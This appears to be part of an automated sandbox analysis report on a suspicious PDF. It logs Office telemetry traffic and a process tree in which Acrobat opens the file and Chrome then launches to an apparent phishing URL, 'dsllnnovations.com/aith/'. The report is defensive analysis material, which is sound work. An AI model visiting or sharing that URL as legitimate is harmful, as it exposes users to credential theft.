                                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                ETag: "0x8DC582BEDC8193E"
                                                x-ms-request-id: e20e9adc-401e-0083-18ae-26075c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232311Z-16849878b78qfbkc5yywmsbg0c00000006xg000000008g78
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.45819113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:11 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:11 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:11 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1397
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                ETag: "0x8DC582BE156D2EE"
                                                x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232311Z-16849878b7898p5f6vryaqvp58000000082g000000007xzs
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.45819313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:11 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:11 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:11 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1406
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                ETag: "0x8DC582BEB16F27E"
                                                x-ms-request-id: 903d302d-701e-0050-069c-276767000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232311Z-16849878b78smng4k6nq15r6s400000008m0000000010qxw
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:11 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.45819513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:12 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:12 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:12 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1414
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                ETag: "0x8DC582BE03B051D"
                                                x-ms-request-id: 3b9e7490-001e-005a-5ccc-28c3d0000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232312Z-r197bdfb6b46kdskt78qagqq1c00000007cg00000000hb5k
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:12 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.45819713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:12 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:12 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:12 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1399
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                ETag: "0x8DC582BE0A2434F"
                                                x-ms-request-id: 3452001d-001e-0065-12df-250b73000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232312Z-16849878b78x6gn56mgecg60qc000000090g00000000df99
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:12 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:19:21:48
                                                Start date:29/10/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\completedfiles.....pdf"
                                                Imagebase:0x7ff6bc1b0000
                                                File size:5'641'176 bytes
                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:1
                                                Start time:19:21:49
                                                Start date:29/10/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:19:21:50
                                                Start date:29/10/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1680,i,5364743034394867823,15920541604491222706,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:19:22:14
                                                Start date:29/10/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://dsllnnovations.com/aith/"
                                                Imagebase:0x7ff76e190000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:10
                                                Start time:19:22:14
                                                Start date:29/10/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1896,i,9296518696687026067,6868305486680022474,262144 /prefetch:8
                                                Imagebase:0x7ff76e190000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                No disassembly